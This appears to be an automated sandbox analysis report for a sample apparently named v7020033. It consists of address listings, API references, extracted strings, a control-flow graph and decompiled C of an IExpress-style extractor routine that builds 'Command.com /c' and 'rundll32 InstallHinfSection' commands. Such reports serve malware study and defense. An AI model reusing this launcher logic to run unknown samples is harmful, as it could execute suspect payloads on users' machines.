                                                                                                                                                                                                        0x00213bfd
                                                                                                                                                                                                        0x00213bff
                                                                                                                                                                                                        0x00213c03
                                                                                                                                                                                                        0x00213c03
                                                                                                                                                                                                        0x00213c11
                                                                                                                                                                                                        0x00213c16
                                                                                                                                                                                                        0x00213c19
                                                                                                                                                                                                        0x00213c28
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213c30
                                                                                                                                                                                                        0x00213c39
                                                                                                                                                                                                        0x00213c40
                                                                                                                                                                                                        0x00213d13
                                                                                                                                                                                                        0x00213d15
                                                                                                                                                                                                        0x00213d21
                                                                                                                                                                                                        0x00213d26
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213c4f
                                                                                                                                                                                                        0x00213c56
                                                                                                                                                                                                        0x00213c60
                                                                                                                                                                                                        0x00213c65
                                                                                                                                                                                                        0x00213c77
                                                                                                                                                                                                        0x00213c78
                                                                                                                                                                                                        0x00213c7c
                                                                                                                                                                                                        0x00213c7e
                                                                                                                                                                                                        0x00213c82
                                                                                                                                                                                                        0x00213c82
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213c7c
                                                                                                                                                                                                        0x00213c67
                                                                                                                                                                                                        0x00213c69
                                                                                                                                                                                                        0x00213c6d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213c58
                                                                                                                                                                                                        0x00213c58
                                                                                                                                                                                                        0x00213c6e
                                                                                                                                                                                                        0x00213c6e
                                                                                                                                                                                                        0x00213c87
                                                                                                                                                                                                        0x00213c89
                                                                                                                                                                                                        0x00213d4d
                                                                                                                                                                                                        0x00213d4f
                                                                                                                                                                                                        0x00213d50
                                                                                                                                                                                                        0x00213d52
                                                                                                                                                                                                        0x00213d9e
                                                                                                                                                                                                        0x00213da8
                                                                                                                                                                                                        0x00213daf
                                                                                                                                                                                                        0x00213db4
                                                                                                                                                                                                        0x00213db6
                                                                                                                                                                                                        0x00213f4d
                                                                                                                                                                                                        0x00213f4d
                                                                                                                                                                                                        0x00213f4f
                                                                                                                                                                                                        0x00213f56
                                                                                                                                                                                                        0x00213f57
                                                                                                                                                                                                        0x00213f58
                                                                                                                                                                                                        0x00213f63
                                                                                                                                                                                                        0x00213f63
                                                                                                                                                                                                        0x00213dbc
                                                                                                                                                                                                        0x00213dc0
                                                                                                                                                                                                        0x00213dc2
                                                                                                                                                                                                        0x00213de6
                                                                                                                                                                                                        0x00213de6
                                                                                                                                                                                                        0x00213de8
                                                                                                                                                                                                        0x00213f0b
                                                                                                                                                                                                        0x00213f0b
                                                                                                                                                                                                        0x00213f0f
                                                                                                                                                                                                        0x00213f13
                                                                                                                                                                                                        0x00213f15
                                                                                                                                                                                                        0x00213f1a
                                                                                                                                                                                                        0x00213f1c
                                                                                                                                                                                                        0x00213f46
                                                                                                                                                                                                        0x00213f47
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213f47
                                                                                                                                                                                                        0x00213f1e
                                                                                                                                                                                                        0x00213f1f
                                                                                                                                                                                                        0x00213f25
                                                                                                                                                                                                        0x00213f26
                                                                                                                                                                                                        0x00213f2a
                                                                                                                                                                                                        0x00213f2d
                                                                                                                                                                                                        0x00213fd9
                                                                                                                                                                                                        0x00213fd9
                                                                                                                                                                                                        0x00213fda
                                                                                                                                                                                                        0x00213fda
                                                                                                                                                                                                        0x00213fe1
                                                                                                                                                                                                        0x00213fe3
                                                                                                                                                                                                        0x00213fe3
                                                                                                                                                                                                        0x00213fe8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213fe8
                                                                                                                                                                                                        0x00213f33
                                                                                                                                                                                                        0x00213f37
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213f37
                                                                                                                                                                                                        0x00213dee
                                                                                                                                                                                                        0x00213dee
                                                                                                                                                                                                        0x00213df5
                                                                                                                                                                                                        0x00213fad
                                                                                                                                                                                                        0x00213fb9
                                                                                                                                                                                                        0x00213fc2
                                                                                                                                                                                                        0x00213fc8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213fc8
                                                                                                                                                                                                        0x00213dfb
                                                                                                                                                                                                        0x00213dfd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213e03
                                                                                                                                                                                                        0x00213e0a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213e15
                                                                                                                                                                                                        0x00213e17
                                                                                                                                                                                                        0x00213e19
                                                                                                                                                                                                        0x00213f94
                                                                                                                                                                                                        0x00213fa4
                                                                                                                                                                                                        0x00213f7c
                                                                                                                                                                                                        0x00213f80
                                                                                                                                                                                                        0x00213f8b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213f8b
                                                                                                                                                                                                        0x00213e2c
                                                                                                                                                                                                        0x00213e30
                                                                                                                                                                                                        0x00213e34
                                                                                                                                                                                                        0x00213e36
                                                                                                                                                                                                        0x00213f69
                                                                                                                                                                                                        0x00213f6e
                                                                                                                                                                                                        0x00213f70
                                                                                                                                                                                                        0x00213f76
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213f76
                                                                                                                                                                                                        0x00213e3c
                                                                                                                                                                                                        0x00213e43
                                                                                                                                                                                                        0x00213e47
                                                                                                                                                                                                        0x00213e52
                                                                                                                                                                                                        0x00213e56
                                                                                                                                                                                                        0x00213e5c
                                                                                                                                                                                                        0x00213e61
                                                                                                                                                                                                        0x00213e68
                                                                                                                                                                                                        0x00213e70
                                                                                                                                                                                                        0x00213e74
                                                                                                                                                                                                        0x00213e7c
                                                                                                                                                                                                        0x00213e80
                                                                                                                                                                                                        0x00213e82
                                                                                                                                                                                                        0x00213e82
                                                                                                                                                                                                        0x00213e87
                                                                                                                                                                                                        0x00213e87
                                                                                                                                                                                                        0x00213e8b
                                                                                                                                                                                                        0x00213e91
                                                                                                                                                                                                        0x00213e94
                                                                                                                                                                                                        0x00213e96
                                                                                                                                                                                                        0x00213e96
                                                                                                                                                                                                        0x00213e9b
                                                                                                                                                                                                        0x00213e9b
                                                                                                                                                                                                        0x00213e9f
                                                                                                                                                                                                        0x00213ea2
                                                                                                                                                                                                        0x00213ea4
                                                                                                                                                                                                        0x00213ea4
                                                                                                                                                                                                        0x00213ea9
                                                                                                                                                                                                        0x00213ea9
                                                                                                                                                                                                        0x00213ead
                                                                                                                                                                                                        0x00213eb3
                                                                                                                                                                                                        0x00213eb6
                                                                                                                                                                                                        0x00213eb8
                                                                                                                                                                                                        0x00213eb8
                                                                                                                                                                                                        0x00213ebd
                                                                                                                                                                                                        0x00213ebd
                                                                                                                                                                                                        0x00213ec1
                                                                                                                                                                                                        0x00213ec3
                                                                                                                                                                                                        0x00213ec5
                                                                                                                                                                                                        0x00213ec5
                                                                                                                                                                                                        0x00213eca
                                                                                                                                                                                                        0x00213eca
                                                                                                                                                                                                        0x00213ece
                                                                                                                                                                                                        0x00213ed5
                                                                                                                                                                                                        0x00213ed9
                                                                                                                                                                                                        0x00213ee0
                                                                                                                                                                                                        0x00213ee6
                                                                                                                                                                                                        0x00213eea
                                                                                                                                                                                                        0x00213eec
                                                                                                                                                                                                        0x00213eee
                                                                                                                                                                                                        0x00213ef3
                                                                                                                                                                                                        0x00213ef3
                                                                                                                                                                                                        0x00213ef5
                                                                                                                                                                                                        0x00213efa
                                                                                                                                                                                                        0x00213efb
                                                                                                                                                                                                        0x00213efd
                                                                                                                                                                                                        0x00213f40
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213eff
                                                                                                                                                                                                        0x00213eff
                                                                                                                                                                                                        0x00213f05
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213f05
                                                                                                                                                                                                        0x00213efd
                                                                                                                                                                                                        0x00213dc7
                                                                                                                                                                                                        0x00213dce
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213dd0
                                                                                                                                                                                                        0x00213dd7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213dd9
                                                                                                                                                                                                        0x00213ddb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213ddd
                                                                                                                                                                                                        0x00213de1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213de1
                                                                                                                                                                                                        0x00213d59
                                                                                                                                                                                                        0x00213d65
                                                                                                                                                                                                        0x00213d6a
                                                                                                                                                                                                        0x00213d6c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213d6e
                                                                                                                                                                                                        0x00213d75
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213d8f
                                                                                                                                                                                                        0x00213d96
                                                                                                                                                                                                        0x00213d98
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213d98
                                                                                                                                                                                                        0x00213c8f
                                                                                                                                                                                                        0x00213c98
                                                                                                                                                                                                        0x00213cf1
                                                                                                                                                                                                        0x00213cf3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213cfe
                                                                                                                                                                                                        0x00213d11
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213d11
                                                                                                                                                                                                        0x00213c9c
                                                                                                                                                                                                        0x00213ca5
                                                                                                                                                                                                        0x00213ca7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213cad
                                                                                                                                                                                                        0x00213cb2
                                                                                                                                                                                                        0x00213cb7
                                                                                                                                                                                                        0x00213cc5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213ce8
                                                                                                                                                                                                        0x00213cec
                                                                                                                                                                                                        0x00213ced
                                                                                                                                                                                                        0x00213ced
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213ce8
                                                                                                                                                                                                        0x00213c9e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213c9e
                                                                                                                                                                                                        0x00213c56
                                                                                                                                                                                                        0x00213d35
                                                                                                                                                                                                        0x00213d35
                                                                                                                                                                                                        0x00213d3c
                                                                                                                                                                                                        0x00213d48
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213d48
                                                                                                                                                                                                        0x00213c03
                                                                                                                                                                                                        0x00213be2
                                                                                                                                                                                                        0x00213be7
                                                                                                                                                                                                        0x00213bee
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 00213C11
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00213CDC
                                                                                                                                                                                                          • Part of subcall function 0021468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002146A0
                                                                                                                                                                                                          • Part of subcall function 0021468F: SizeofResource.KERNEL32(00000000,00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146A9
                                                                                                                                                                                                          • Part of subcall function 0021468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002146C3
                                                                                                                                                                                                          • Part of subcall function 0021468F: LoadResource.KERNEL32(00000000,00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146CC
                                                                                                                                                                                                          • Part of subcall function 0021468F: LockResource.KERNEL32(00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146D3
                                                                                                                                                                                                          • Part of subcall function 0021468F: memcpy_s.MSVCRT ref: 002146E5
                                                                                                                                                                                                          • Part of subcall function 0021468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 002146EF
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00218C42), ref: 00213D8F
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00213E26
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00218C42), ref: 00213EFF
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,00218C42), ref: 00213F1F
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00218C42), ref: 00213F40
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,00218C42), ref: 00213F47
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00218C42), ref: 00213F76
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00218C42), ref: 00213F80
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00218C42), ref: 00213FC2
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                        • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$photo660
                                                                                                                                                                                                        • API String ID: 1032054927-3154895515
                                                                                                                                                                                                        • Opcode ID: 6a6dbc8ecf00135808f25ead84816d9d8ccc9dfa96fcf1bf378f2ca1a593ae45
                                                                                                                                                                                                        • Instruction ID: a86babc443b2954a5ed1eed615739395cc015678b5c9ca3408e10e4acceda49f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6a6dbc8ecf00135808f25ead84816d9d8ccc9dfa96fcf1bf378f2ca1a593ae45
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6B1E6705243029BD720DF24A849BEB76E6EBB5710F10492EFA89D61D0DB70C9E5CB92
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00211AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 141 211ae8-211b2c call 211680 144 211b3b-211b40 141->144 145 211b2e-211b39 141->145 146 211b46-211b61 call 211a84 144->146 145->146 149 211b63-211b65 146->149 150 211b9f-211bc2 call 211781 call 21658a 146->150 151 211b68-211b6d 149->151 157 211bc7-211bd3 call 2166c8 150->157 151->151 154 211b6f-211b74 151->154 154->150 156 211b76-211b7b 154->156 158 211b83-211b86 156->158 159 211b7d-211b81 156->159 165 211d73-211d7f call 2166c8 157->165 166 211bd9-211bf1 CompareStringA 157->166 158->150 162 211b88-211b8a 158->162 159->158 161 211b8c-211b9d call 211680 159->161 161->157 162->150 162->161 175 211d81-211d99 CompareStringA 165->175 176 211df8-211e09 LocalAlloc 165->176 166->165 168 211bf7-211c07 GetFileAttributesA 166->168 170 211d53-211d5e 168->170 171 211c0d-211c15 168->171 173 211d64-211d6e call 2144b9 170->173 171->170 174 211c1b-211c33 call 211a84 171->174 188 211e94-211ea4 call 216ce0 173->188 190 211c50-211c61 LocalAlloc 174->190 191 211c35-211c38 174->191 175->176 181 211d9b-211da2 175->181 178 211dd4-211ddf 176->178 179 211e0b-211e1b GetFileAttributesA 176->179 178->173 183 211e67-211e73 call 211680 179->183 184 211e1d-211e1f 179->184 186 211da5-211daa 181->186 194 211e78-211e84 call 212aac 183->194 184->183 189 211e21-211e3e call 211781 184->189 186->186 192 211dac-211db4 186->192 189->194 210 211e40-211e43 189->210 190->178 193 211c67-211c72 190->193 197 211c40-211c4b call 211a84 191->197 198 211c3a 191->198 199 211db7-211dbc 192->199 200 211c74 193->200 201 211c79-211cc0 GetPrivateProfileIntA GetPrivateProfileStringA 193->201 209 211e89-211e92 194->209 197->190 198->197 199->199 206 211dbe-211dd2 LocalAlloc 199->206 200->201 207 211cc2-211ccc 201->207 208 211cf8-211d07 201->208 206->178 211 211de1-211df3 call 21171e 206->211 213 211cd3-211cf3 call 211680 * 2 207->213 214 211cce 207->214 216 211d23 208->216 217 211d09-211d21 GetShortPathNameA 208->217 209->188 210->194 215 211e45-211e65 call 2116b3 * 2 210->215 211->209 213->209 214->213 215->194 221 211d28-211d2b 216->221 217->221 224 211d32-211d4e call 21171e 221->224 225 211d2d 221->225 224->209 225->224
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00211AE8(long __ecx, CHAR** _a4, int* _a8) {
				signed int _v8;
				char _v268;
				char _v527;
				char _v528;
				char _v1552;
				CHAR* _v1556;
				int* _v1560;
				CHAR** _v1564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				CHAR* _t53;
				CHAR* _t54;
				char* _t57;
				char* _t58;
				CHAR* _t60;
				void* _t62;
				signed char _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				unsigned int _t85;
				CHAR* _t90;
				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0x218004; // 0x58ac7c6d
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E00211680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E00211A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E00211781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
					E0021658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E00211680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E002166C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E002166C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E00211680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E00211781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E002116B3( &_v1552, 0x400, " ");
										E002116B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E00212AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E0021171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E00211A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E00211A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E002144B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0x219120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x211140, _t156, 8,  &_v268) == 0) {
										 *0x219a34 =  *0x219a34 & 0xfffffffb;
										if( *0x219a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E0021171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0x219a34 =  *0x219a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E00211680(_t108, 0x104, _t155);
										_t140 = 0x200;
										E00211680(_t156, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1564 = _t156;
									L54:
									_pop(_t152);
									return E00216CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
								}
							}
						}
					}
				}
			}














































                                                                                                                                                                                                        0x00211af3
                                                                                                                                                                                                        0x00211afa
                                                                                                                                                                                                        0x00211b07
                                                                                                                                                                                                        0x00211b09
                                                                                                                                                                                                        0x00211b1a
                                                                                                                                                                                                        0x00211b20
                                                                                                                                                                                                        0x00211b2c
                                                                                                                                                                                                        0x00211b3b
                                                                                                                                                                                                        0x00211b40
                                                                                                                                                                                                        0x00211b2e
                                                                                                                                                                                                        0x00211b2e
                                                                                                                                                                                                        0x00211b33
                                                                                                                                                                                                        0x00211b33
                                                                                                                                                                                                        0x00211b46
                                                                                                                                                                                                        0x00211b4c
                                                                                                                                                                                                        0x00211b52
                                                                                                                                                                                                        0x00211b57
                                                                                                                                                                                                        0x00211b5d
                                                                                                                                                                                                        0x00211b61
                                                                                                                                                                                                        0x00211b9f
                                                                                                                                                                                                        0x00211b9f
                                                                                                                                                                                                        0x00211bb1
                                                                                                                                                                                                        0x00211bc2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00211b63
                                                                                                                                                                                                        0x00211b63
                                                                                                                                                                                                        0x00211b65
                                                                                                                                                                                                        0x00211b68
                                                                                                                                                                                                        0x00211b68
                                                                                                                                                                                                        0x00211b6a
                                                                                                                                                                                                        0x00211b6b
                                                                                                                                                                                                        0x00211b6f
                                                                                                                                                                                                        0x00211b74
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00211b76
                                                                                                                                                                                                        0x00211b7b
                                                                                                                                                                                                        0x00211b86
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00211b8c
                                                                                                                                                                                                        0x00211b8c
                                                                                                                                                                                                        0x00211b98
                                                                                                                                                                                                        0x00211bc7
                                                                                                                                                                                                        0x00211bc9
                                                                                                                                                                                                        0x00211bcc
                                                                                                                                                                                                        0x00211bd3
                                                                                                                                                                                                        0x00211d75
                                                                                                                                                                                                        0x00211d76
                                                                                                                                                                                                        0x00211d78
                                                                                                                                                                                                        0x00211d7f
                                                                                                                                                                                                        0x00211e05
                                                                                                                                                                                                        0x00211e09
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00211e12
                                                                                                                                                                                                        0x00211e1b
                                                                                                                                                                                                        0x00211e73
                                                                                                                                                                                                        0x00211e21
                                                                                                                                                                                                        0x00211e21
                                                                                                                                                                                                        0x00211e28
                                                                                                                                                                                                        0x00211e37
                                                                                                                                                                                                        0x00211e3e
                                                                                                                                                                                                        0x00211e52
                                                                                                                                                                                                        0x00211e60
                                                                                                                                                                                                        0x00211e60
                                                                                                                                                                                                        0x00211e3e
                                                                                                                                                                                                        0x00211e79
                                                                                                                                                                                                        0x00211e7b
                                                                                                                                                                                                        0x00211e84
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00211d9b
                                                                                                                                                                                                        0x00211d9b
                                                                                                                                                                                                        0x00211da0
                                                                                                                                                                                                        0x00211da2
                                                                                                                                                                                                        0x00211da5
                                                                                                                                                                                                        0x00211da5
                                                                                                                                                                                                        0x00211da7
                                                                                                                                                                                                        0x00211da8
                                                                                                                                                                                                        0x00211dac
                                                                                                                                                                                                        0x00211dae
                                                                                                                                                                                                        0x00211db4
                                                                                                                                                                                                        0x00211db7
                                                                                                                                                                                                        0x00211db7
                                                                                                                                                                                                        0x00211db9
                                                                                                                                                                                                        0x00211dba
                                                                                                                                                                                                        0x00211dbe
                                                                                                                                                                                                        0x00211dc3
                                                                                                                                                                                                        0x00211dce
                                                                                                                                                                                                        0x00211dd2
                                                                                                                                                                                                        0x00211deb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00211df0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00211dd2
                                                                                                                                                                                                        0x00211bf7
                                                                                                                                                                                                        0x00211bfe
                                                                                                                                                                                                        0x00211c07
                                                                                                                                                                                                        0x00211d55
                                                                                                                                                                                                        0x00211d5a
                                                                                                                                                                                                        0x00211d5b
                                                                                                                                                                                                        0x00211d5d
                                                                                                                                                                                                        0x00211d5e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00211c1b
                                                                                                                                                                                                        0x00211c1b
                                                                                                                                                                                                        0x00211c20
                                                                                                                                                                                                        0x00211c2c
                                                                                                                                                                                                        0x00211c33
                                                                                                                                                                                                        0x00211c38
                                                                                                                                                                                                        0x00211c3a
                                                                                                                                                                                                        0x00211c3a
                                                                                                                                                                                                        0x00211c40
                                                                                                                                                                                                        0x00211c4b
                                                                                                                                                                                                        0x00211c4b
                                                                                                                                                                                                        0x00211c5d
                                                                                                                                                                                                        0x00211c61
                                                                                                                                                                                                        0x00211dd4
                                                                                                                                                                                                        0x00211dd4
                                                                                                                                                                                                        0x00211dd6
                                                                                                                                                                                                        0x00211ddb
                                                                                                                                                                                                        0x00211ddc
                                                                                                                                                                                                        0x00211dde
                                                                                                                                                                                                        0x00211d64
                                                                                                                                                                                                        0x00211d64
                                                                                                                                                                                                        0x00211d67
                                                                                                                                                                                                        0x00211d6c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00211c67
                                                                                                                                                                                                        0x00211c67
                                                                                                                                                                                                        0x00211c6d
                                                                                                                                                                                                        0x00211c72
                                                                                                                                                                                                        0x00211c74
                                                                                                                                                                                                        0x00211c74
                                                                                                                                                                                                        0x00211c8e
                                                                                                                                                                                                        0x00211c99
                                                                                                                                                                                                        0x00211cc0
                                                                                                                                                                                                        0x00211cf8
                                                                                                                                                                                                        0x00211d07
                                                                                                                                                                                                        0x00211d23
                                                                                                                                                                                                        0x00211d09
                                                                                                                                                                                                        0x00211d14
                                                                                                                                                                                                        0x00211d1b
                                                                                                                                                                                                        0x00211d1b
                                                                                                                                                                                                        0x00211d2b
                                                                                                                                                                                                        0x00211d2d
                                                                                                                                                                                                        0x00211d2d
                                                                                                                                                                                                        0x00211d38
                                                                                                                                                                                                        0x00211d39
